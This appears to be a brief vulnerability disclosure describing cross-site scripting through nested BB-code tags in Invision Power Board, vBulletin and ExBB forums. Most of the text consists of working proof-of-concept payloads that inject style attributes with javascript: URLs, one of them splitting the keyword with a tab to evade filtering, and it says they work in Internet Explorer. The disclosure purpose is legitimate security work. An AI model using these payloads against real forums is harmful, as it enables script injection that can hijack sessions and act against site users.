XSS in the nested BB tag in many forum
XSS was found in the nested BB tag in many forum:
Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]
vBulletin
[EMAIL=[URL=s as=`s@xxxxxx]mailto:assss@xxxxxx]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")
ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert());
Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.
More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php